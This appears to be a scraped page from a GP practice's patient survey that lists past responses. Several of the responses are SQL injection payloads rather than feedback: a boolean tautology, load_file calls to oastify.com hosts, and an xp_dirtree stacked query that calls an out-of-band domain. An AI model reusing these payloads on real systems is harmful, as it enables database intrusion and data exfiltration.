Summary of past responses
You must include a field id or key in your graph shortcode.Recent responses
Thinking about our GP practice… Overall, how was your experience of our service? | Please can you tell us why you gave your answer? | Please tell us about anything that we could have… | Date |
Very good | [10] | [11] | June 27, 2023 at 11:14 am |
Very good81954769′ or ‘1762’=’1762 | [10] | [11] | June 27, 2023 at 11:14 am |
Very good’+(select load_file(‘\6pwjwpgcga5g3w1fm9vqnkqgg7m6ay4mvpjh6eu3.oastify.comult’))+’ | [10] | [11] | June 27, 2023 at 11:13 am |
(select load_file(‘\424h9ntat8ieguedz78o0i3et5z4nwhk8mwejb70.oastify.combbe’)) | [10] | [11] | June 27, 2023 at 11:13 am |
Very good’;declare @q varchar(99);set @q=’zorcvif5f3492p08l2ujmdp9f0lz9r3fu6iy5vtk.oasti’+’fy.comfgl’; exec master.dbo.xp_dirtree @q;– | [10] | [11] | June 27, 2023 at 11:13 am |